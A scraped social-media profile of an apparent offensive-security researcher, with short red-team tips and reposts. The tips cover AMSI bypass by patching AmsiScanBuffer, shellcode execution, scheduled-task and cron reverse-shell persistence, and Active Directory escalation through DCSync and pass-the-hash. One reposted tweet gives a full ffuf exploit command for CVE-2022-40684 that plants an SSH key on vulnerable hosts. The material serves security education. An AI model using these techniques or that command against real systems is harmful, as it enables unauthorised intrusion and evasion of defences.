@cyb3rkh4l1d Profile picture

Khalid Maina

@cyb3rkh4l1d

Professional@( AppSec | ApiSec | NetSec | OffSec | InfoSec ). Enthusiast@(Robotics | MicroServices ).

Joined December 2021
Similar User
MD Sagor Hossain (Professor) 🇧🇩 photo

@bughuntar

Tarek Bouali photo

@iambouali

Mahbob Alam 🇧🇩 photo

@EmptyMahbob

Shakti Ranjan Mohanty || 🇮🇳 || photo

@3ncryptSaan

Harish photo

@CoderHarish

hi, bro photo

@0X72368887346

CyCatz photo

@CyCatz_Official

Anon_Y0gi photo

@AnonY0gi

mehrab opi🇧🇩 photo

@mehrab_opi33500

Abdelkader Mouaz photo

@hamzadzworm

Saiful Islam photo

@bubalula_yeee

Leonidas D. Ace (Md Rafi Ahamed) 🇧🇩 photo

@L3onid1s

Today Cyber News photo

@TodayCyberNews

D4rkNinj4 photo

@th3_d4rkninj4

g30rgy th3 d4rk photo

@Crypt0g30rgy

Khalid Maina Reposted

Defend your network with $70 off this cybersecurity course bundle bleepingcomputer.com/offer/deals/de…">bleepingcomputer.com/offer/deals/de… bleepingcomputer.com/offer/deals/de…">bleepingcomputer.com/offer/deals/de…


Khalid Maina Reposted

The $5 Membership sale is now live! The sale lasts until July 17 23:59 UTC: account.shodan.io/billing/member


Khalid Maina Reposted

#CVE-2023-2982 #WordPress Social Login and Register authentication bypass🚩 FOFA Query: body="/wp-content/plugins/miniorange-login-openid" Link: enbeta.fofa.info/result?qbase64… Refer: lana.codes/lanavdb/2326f4… #cybersecurity #infosec #OSINT #FOFA #ThreatIntelligence

Tweet Image 1

Khalid Maina Reposted

Platforms To Learn Cybersecurity #Cybersecurity #infosec #education #Hacked #Hacking #BugBounty

Tweet Image 1

-> Establish persistence using schtasks. -> This will create a scheduled task to spawn backdoor.exe at 11:30. #infosec #cybersecuritytips #redteam

Tweet Image 1

Another hit🔥 Tips: After removing the invited user, try to use the invitation link sent to the user. #bugbountytips #hackerone #infosec

Tweet Image 1
Tweet Image 2

The path is clear -> If you have GenericAll on a group, you can add yourself to the group -> If you have WriteDacl on a domain, You can execute Dcsync Attack to retrieve Account hashes. ->If you have hashes, you can execute Pass-The-Hash attack to gain access Simple #infosec

Tweet Image 1
Tweet Image 2

This is possible because any machine account with SERVER_TRUST_ACCOUNT flag set will have the Replications right. cyberkhalid.github.io/posts/machuser/

Tweet Image 1
Tweet Image 2
Tweet Image 3
Tweet Image 4

Shellcode will be executed by calling EnumPageFilesW() function with the pCallBackRoutine parameter set to the base address of the shellcode. #cybersecurity #infosec #redteaming #pentesting

Tweet Image 1
Tweet Image 2
Tweet Image 3
Tweet Image 4

Khalid Maina Reposted

CVE-2022-42983 anji-plus AJ-Report 0.9.8.6 allows remote attackers to bypass login authentication by spoofing JWT Tokens. cve.mitre.org/cgi-bin/cvenam…


Malware can use CreateThread() function from kernel32.dll library to execute a shellcode. #cybersecurity #infosec #offsec #redteaming #pentesting #windows

Tweet Image 1
Tweet Image 2
Tweet Image 3
Tweet Image 4

Khalid Maina Reposted

CVE-2022-40684 ffuf -w "host_list.txt:URL" -u "https://URL/api/v2/cmdb/system/admin/admin" -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "h4x0r"}' -mr "SSH" -r

Tweet Image 1

If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. This could lead to authentication bypass. cyberkhalid.github.io/posts/hheada/ #infosec

Tweet Image 1
Tweet Image 2
Tweet Image 3

Pass the Ticket(Ptt) is a credential theft technique that enables adversaries to use stolen Kerberos tickets to authenticate to resources (e.g., file shares and other computers) as a user without having to compromise that user’s password. cyberkhalid.github.io/posts/ptt/ #cybersecurity

Tweet Image 1
Tweet Image 2
Tweet Image 3

Since AmsiScanBuffer() function is responsible for checking the inputs for malicious content, We can modify the function to always return 0 regardless of whether or not the input is malicious. Since returning 0 simply means the function successfully scanned the inputs.

Tweet Image 1
Tweet Image 2
Tweet Image 3
Tweet Image 4

Once you got root access on any host, you can add any scheduled task. You could even just configure a task where every minute a reverse shell is sent to you. cyberkhalid.github.io/posts/pcron/ #redteam #cybersecurity #infosec

Tweet Image 1
Tweet Image 2
Tweet Image 3
Tweet Image 4

If we can change the configuration of a service, and at thesame time we can stop/start the service , then we can achieve Privilege Escalation if the service runs with a higher privileges. cyberkhalid.github.io/posts/winprivs… #cybersecurity #infosec #redteam #windows

Tweet Image 1
Tweet Image 2
Tweet Image 3
Tweet Image 4

Adversaries may leverage the Windows CreateThread function from Kernel32.dll to execute a malicious code within the virtual address space of the calling process. cyberkhalid.github.io/posts/createth… #cybersecurity #infosec #redteam #windows

Tweet Image 1
Tweet Image 2
Tweet Image 3
Tweet Image 4

If attacker is able to manipulate the ACL for AdminSDHolder, then those ACL will automatically be applied to all protected objects. #cybersecurity #infosec #pentesting #redteam #windows #activedirectory

Tweet Image 1
Tweet Image 2
Tweet Image 3
Tweet Image 4

Loading...

Something went wrong.


Something went wrong.